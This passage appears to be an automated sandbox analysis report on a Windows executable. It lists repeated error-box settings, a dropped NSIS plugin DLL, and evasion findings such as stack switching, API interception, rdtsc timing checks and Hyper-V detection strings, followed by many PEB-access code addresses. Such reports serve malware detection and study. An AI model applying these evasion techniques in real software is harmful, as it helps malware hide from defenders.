      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeAPI/Special instruction interceptor: Address: 5E40C68
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeAPI/Special instruction interceptor: Address: 4A70C68
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeAPI/Special instruction interceptor: Address: 7FFA20B90594
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeAPI/Special instruction interceptor: Address: 7FFA20B8FF74
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeAPI/Special instruction interceptor: Address: 7FFA20B8D6C4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeAPI/Special instruction interceptor: Address: 7FFA20B8D864
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1763 rdtsc 3_2_35FD1763
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi9279.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeAPI coverage: 0.3 %
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: LkzvfB4VFj.exe, 00000003.00000002.93668767945.0000000005D28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
      Source: LkzvfB4VFj.exe, 00000003.00000003.93042110969.0000000005D91000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005D91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeAPI call chain: ExitProcess graph end nodegraph_0-4154
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeAPI call chain: ExitProcess graph end nodegraph_0-3977
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1763 rdtsc 3_2_35FD1763
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD34E0 NtCreateMutant,LdrInitializeThunk,3_2_35FD34E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_6FEB1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6FEB1A98
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36019603 mov eax, dword ptr fs:[00000030h]3_2_36019603
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F607 mov eax, dword ptr fs:[00000030h]3_2_3604F607
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36023608 mov eax, dword ptr fs:[00000030h]3_2_36023608
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36023608 mov eax, dword ptr fs:[00000030h]3_2_36023608
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36023608 mov eax, dword ptr fs:[00000030h]3_2_36023608
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36023608 mov eax, dword ptr fs:[00000030h]3_2_36023608
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36023608 mov eax, dword ptr fs:[00000030h]3_2_36023608
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36023608 mov eax, dword ptr fs:[00000030h]3_2_36023608
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC15EF mov eax, dword ptr fs:[00000030h]3_2_35FC15EF
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B5E0 mov eax, dword ptr fs:[00000030h]3_2_35F9B5E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B5E0 mov eax, dword ptr fs:[00000030h]3_2_35F9B5E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B5E0 mov eax, dword ptr fs:[00000030h]3_2_35F9B5E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B5E0 mov eax, dword ptr fs:[00000030h]3_2_35F9B5E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B5E0 mov eax, dword ptr fs:[00000030h]3_2_35F9B5E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9B5E0 mov eax, dword ptr fs:[00000030h]3_2_35F9B5E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603D62C mov ecx, dword ptr fs:[00000030h]3_2_3603D62C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603D62C mov ecx, dword ptr fs:[00000030h]3_2_3603D62C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603D62C mov eax, dword ptr fs:[00000030h]3_2_3603D62C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F5C7 mov eax, dword ptr fs:[00000030h]3_2_35F8F5C7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36025660 mov eax, dword ptr fs:[00000030h]3_2_36025660
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601166E mov eax, dword ptr fs:[00000030h]3_2_3601166E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601166E mov eax, dword ptr fs:[00000030h]3_2_3601166E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601166E mov eax, dword ptr fs:[00000030h]3_2_3601166E
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC9580 mov eax, dword ptr fs:[00000030h]3_2_35FC9580
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC9580 mov eax, dword ptr fs:[00000030h]3_2_35FC9580
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F68C mov eax, dword ptr fs:[00000030h]3_2_3604F68C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600D69D mov eax, dword ptr fs:[00000030h]3_2_3600D69D
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8753F mov eax, dword ptr fs:[00000030h]3_2_35F8753F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8753F mov eax, dword ptr fs:[00000030h]3_2_35F8753F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8753F mov eax, dword ptr fs:[00000030h]3_2_35F8753F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F93536 mov eax, dword ptr fs:[00000030h]3_2_35F93536
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F93536 mov eax, dword ptr fs:[00000030h]3_2_35F93536
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC1527 mov eax, dword ptr fs:[00000030h]3_2_35FC1527
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCF523 mov eax, dword ptr fs:[00000030h]3_2_35FCF523
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360256E0 mov eax, dword ptr fs:[00000030h]3_2_360256E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360256E0 mov eax, dword ptr fs:[00000030h]3_2_360256E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB1514 mov eax, dword ptr fs:[00000030h]3_2_35FB1514
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB1514 mov eax, dword ptr fs:[00000030h]3_2_35FB1514
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB1514 mov eax, dword ptr fs:[00000030h]3_2_35FB1514
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB1514 mov eax, dword ptr fs:[00000030h]3_2_35FB1514
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB1514 mov eax, dword ptr fs:[00000030h]3_2_35FB1514
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB1514 mov eax, dword ptr fs:[00000030h]3_2_35FB1514
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B502 mov eax, dword ptr fs:[00000030h]3_2_35F8B502
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB94FA mov eax, dword ptr fs:[00000030h]3_2_35FB94FA
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605970B mov eax, dword ptr fs:[00000030h]3_2_3605970B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605970B mov eax, dword ptr fs:[00000030h]3_2_3605970B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F717 mov eax, dword ptr fs:[00000030h]3_2_3604F717
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC54E0 mov eax, dword ptr fs:[00000030h]3_2_35FC54E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBF4D0 mov eax, dword ptr fs:[00000030h]3_2_35FBF4D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB14C9 mov eax, dword ptr fs:[00000030h]3_2_35FB14C9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB14C9 mov eax, dword ptr fs:[00000030h]3_2_35FB14C9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB14C9 mov eax, dword ptr fs:[00000030h]3_2_35FB14C9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB14C9 mov eax, dword ptr fs:[00000030h]3_2_35FB14C9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FB14C9 mov eax, dword ptr fs:[00000030h]3_2_35FB14C9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601174B mov eax, dword ptr fs:[00000030h]3_2_3601174B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601174B mov ecx, dword ptr fs:[00000030h]3_2_3601174B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCB490 mov eax, dword ptr fs:[00000030h]3_2_35FCB490
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCB490 mov eax, dword ptr fs:[00000030h]3_2_35FCB490
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606B781 mov eax, dword ptr fs:[00000030h]3_2_3606B781
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3606B781 mov eax, dword ptr fs:[00000030h]3_2_3606B781
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605D7A7 mov eax, dword ptr fs:[00000030h]3_2_3605D7A7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605D7A7 mov eax, dword ptr fs:[00000030h]3_2_3605D7A7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605D7A7 mov eax, dword ptr fs:[00000030h]3_2_3605D7A7
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCD450 mov eax, dword ptr fs:[00000030h]3_2_35FCD450
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FCD450 mov eax, dword ptr fs:[00000030h]3_2_35FCD450
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9D454 mov eax, dword ptr fs:[00000030h]3_2_35F9D454
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9D454 mov eax, dword ptr fs:[00000030h]3_2_35F9D454
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9D454 mov eax, dword ptr fs:[00000030h]3_2_35F9D454
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9D454 mov eax, dword ptr fs:[00000030h]3_2_35F9D454
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9D454 mov eax, dword ptr fs:[00000030h]3_2_35F9D454
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F9D454 mov eax, dword ptr fs:[00000030h]3_2_35F9D454
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360617BC mov eax, dword ptr fs:[00000030h]3_2_360617BC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F7CF mov eax, dword ptr fs:[00000030h]3_2_3604F7CF
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8B420 mov eax, dword ptr fs:[00000030h]3_2_35F8B420
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC7425 mov eax, dword ptr fs:[00000030h]3_2_35FC7425
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC7425 mov ecx, dword ptr fs:[00000030h]3_2_35FC7425
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F977F9 mov eax, dword ptr fs:[00000030h]3_2_35F977F9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F977F9 mov eax, dword ptr fs:[00000030h]3_2_35F977F9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F409 mov eax, dword ptr fs:[00000030h]3_2_3604F409
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F937E4 mov eax, dword ptr fs:[00000030h]3_2_35F937E4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F937E4 mov eax, dword ptr fs:[00000030h]3_2_35F937E4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F937E4 mov eax, dword ptr fs:[00000030h]3_2_35F937E4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F937E4 mov eax, dword ptr fs:[00000030h]3_2_35F937E4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F937E4 mov eax, dword ptr fs:[00000030h]3_2_35F937E4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F937E4 mov eax, dword ptr fs:[00000030h]3_2_35F937E4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F937E4 mov eax, dword ptr fs:[00000030h]3_2_35F937E4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602B420 mov eax, dword ptr fs:[00000030h]3_2_3602B420
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3602B420 mov eax, dword ptr fs:[00000030h]3_2_3602B420
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36019429 mov eax, dword ptr fs:[00000030h]3_2_36019429
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601F42F mov eax, dword ptr fs:[00000030h]3_2_3601F42F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601F42F mov eax, dword ptr fs:[00000030h]3_2_3601F42F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601F42F mov eax, dword ptr fs:[00000030h]3_2_3601F42F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601F42F mov eax, dword ptr fs:[00000030h]3_2_3601F42F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601F42F mov eax, dword ptr fs:[00000030h]3_2_3601F42F
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604D430 mov eax, dword ptr fs:[00000030h]3_2_3604D430
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604D430 mov eax, dword ptr fs:[00000030h]3_2_3604D430
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC1796 mov eax, dword ptr fs:[00000030h]3_2_35FC1796
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FC1796 mov eax, dword ptr fs:[00000030h]3_2_35FC1796
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604F478 mov eax, dword ptr fs:[00000030h]3_2_3604F478
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1763 mov eax, dword ptr fs:[00000030h]3_2_35FD1763
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1763 mov eax, dword ptr fs:[00000030h]3_2_35FD1763
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1763 mov eax, dword ptr fs:[00000030h]3_2_35FD1763
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1763 mov eax, dword ptr fs:[00000030h]3_2_35FD1763
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1763 mov eax, dword ptr fs:[00000030h]3_2_35FD1763
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD1763 mov eax, dword ptr fs:[00000030h]3_2_35FD1763
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601D4A0 mov ecx, dword ptr fs:[00000030h]3_2_3601D4A0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601D4A0 mov eax, dword ptr fs:[00000030h]3_2_3601D4A0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601D4A0 mov eax, dword ptr fs:[00000030h]3_2_3601D4A0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F75B mov eax, dword ptr fs:[00000030h]3_2_35F8F75B
